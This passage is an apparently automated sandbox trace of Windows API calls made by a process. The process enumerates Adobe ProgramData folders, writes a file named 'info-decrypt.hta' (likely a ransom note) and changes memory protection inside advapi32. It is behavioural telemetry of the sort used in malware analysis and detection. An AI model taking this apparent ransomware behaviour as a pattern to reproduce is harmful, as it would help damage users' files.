(dwNewMode=0x1, lpOldMode=0x6e4f00c) returned 1 [0134.106] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x6e4eb14, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x21 [0134.106] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x6e4eae8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x22 [0134.106] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x6e4ed34 | out: lpFindFileData=0x6e4ed34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.107] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.107] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0134.107] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.107] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efcc) returned 1 [0134.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efd8) returned 1 [0134.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4efbc) returned 1 [0134.107] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x6e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2b [0134.107] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", nBufferLength=0x105, lpBuffer=0x6e4ea98, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", lpFilePart=0x0) returned 0x2c [0134.108] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x6e4ece4 | out: lpFindFileData=0x6e4ece4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.257] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4ecf4 | out: lpFindFileData=0x6e4ecf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.257] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4ecf4 | out: lpFindFileData=0x6e4ecf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0134.257] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4ecf4 | out: lpFindFileData=0x6e4ecf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0134.257] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef7c) returned 1 [0134.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef88) returned 1 [0134.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4efbc) returned 1 [0134.258] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x6e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2b [0134.258] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", nBufferLength=0x105, lpBuffer=0x6e4ea98, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", lpFilePart=0x0) returned 0x2c [0134.258] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x6e4ece4 | out: lpFindFileData=0x6e4ece4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.258] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4ecf4 | out: lpFindFileData=0x6e4ecf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.258] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4ecf4 | out: lpFindFileData=0x6e4ecf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0134.258] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4ecf4 | out: lpFindFileData=0x6e4ecf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.258] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef7c) returned 1 [0134.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef88) returned 1 [0134.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ef6c) returned 1 [0134.259] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x6e4ea74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x34 [0134.259] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", nBufferLength=0x105, lpBuffer=0x6e4ea48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpFilePart=0x0) returned 0x35 [0134.259] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x6e4ec94 | out: lpFindFileData=0x6e4ec94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.259] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4eca4 | out: lpFindFileData=0x6e4eca4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.259] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4eca4 | out: lpFindFileData=0x6e4eca4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0134.260] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4eca4 | out: lpFindFileData=0x6e4eca4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.260] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef2c) returned 1 [0134.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef38) returned 1 [0134.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ef6c) returned 1 [0134.260] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x6e4ea74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x34 [0134.260] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", nBufferLength=0x105, lpBuffer=0x6e4ea48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpFilePart=0x0) returned 0x35 [0134.260] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x6e4ec94 | out: lpFindFileData=0x6e4ec94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.260] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4eca4 | out: lpFindFileData=0x6e4eca4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.260] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4eca4 | out: lpFindFileData=0x6e4eca4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0134.261] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x6e4eca4 | out: lpFindFileData=0x6e4eca4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 0 [0134.261] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef2c) returned 1 [0134.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef38) returned 1 [0136.554] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4ea2c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0136.554] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4ea24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0136.554] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6e4ea2c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\info-decrypt.hta", lpFilePart=0x0) returned 0x45 [0136.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee8c) returned 1 [0136.554] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\info-decrypt.hta" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6e4ef08 | out: lpFileInformation=0x6e4ef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee88) returned 1 [0136.555] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4ea24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0136.555] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6e4e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\info-decrypt.hta", lpFilePart=0x0) returned 0x45 [0136.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4edc0) returned 1 [0136.555] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\info-decrypt.hta" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a8 [0136.555] GetFileType (hFile=0x3a8) returned 0x1 [0136.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4edbc) returned 1 [0136.555] GetFileType (hFile=0x3a8) returned 0x1 [0136.555] WriteFile (in: hFile=0x3a8, lpBuffer=0x33fae5c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6e4ee84, lpOverlapped=0x0 | out: lpBuffer=0x33fae5c*, lpNumberOfBytesWritten=0x6e4ee84*=0x1000, lpOverlapped=0x0) returned 1 [0136.556] WriteFile (in: hFile=0x3a8, lpBuffer=0x33fae5c*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6e4ee58, lpOverlapped=0x0 | out: lpBuffer=0x33fae5c*, lpNumberOfBytesWritten=0x6e4ee58*=0x557, lpOverlapped=0x0) returned 1 [0136.557] CloseHandle (hObject=0x3a8) returned 1 [0136.557] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4e9a8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0136.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee54) returned 1 [0136.557] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), fInfoLevelId=0x0, lpFileInformation=0x33fbe78 | out: lpFileInformation=0x33fbe78*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df)) returned 1 [0136.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee50) returned 1 [0136.558] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4e894, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0136.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ed88) returned 1 [0136.558] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0136.558] GetFileType (hFile=0x3a8) returned 0x1 [0136.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ed84) returned 1 [0136.558] GetFileType (hFile=0x3a8) returned 0x1 [0136.558] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x6e4ee90 | out: lpFileSizeHigh=0x6e4ee90*=0x0) returned 0x1df [0136.558] ReadFile (in: hFile=0x3a8, lpBuffer=0x33fc2a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6e4ee3c, lpOverlapped=0x0 | out: lpBuffer=0x33fc2a4*, lpNumberOfBytesRead=0x6e4ee3c*=0x1df, lpOverlapped=0x0) returned 1 [0136.559] CloseHandle (hObject=0x3a8) returned 1 [0139.213] SysReAllocStringLen (in: pbstr=0x6e4e198*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x6e4e198*="advapi32") returned 1 [0139.213] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0139.213] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.281] GetLastError () returned 0x0 [0139.281] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.282] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.282] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x6e4e07c, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.282] GetCurrentProcess () returned 0xffffffff [0139.282] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711520, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.283] GetCurrentProcess () returned 0xffffffff [0139.283] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711520, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.283] GetCurrentProcess () returned 0xffffffff [0139.283] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711540, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.284] GetCurrentProcess () returned 0xffffffff [0139.284] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711540, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.285] GetCurrentProcess () returned 0xffffffff [0139.285] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x7771175c, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.285] GetCurrentProcess () returned 0xffffffff [0139.285] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x7771175c, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.286] GetCurrentProcess () returned 0xffffffff [0139.286] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711768, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.286] GetCurrentProcess () returned 0xffffffff [0139.286] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711768, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.286] GetCurrentProcess () returned 0xffffffff [0139.287] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117b8, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.287] GetCurrentProcess () returned 0xffffffff [0139.287] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 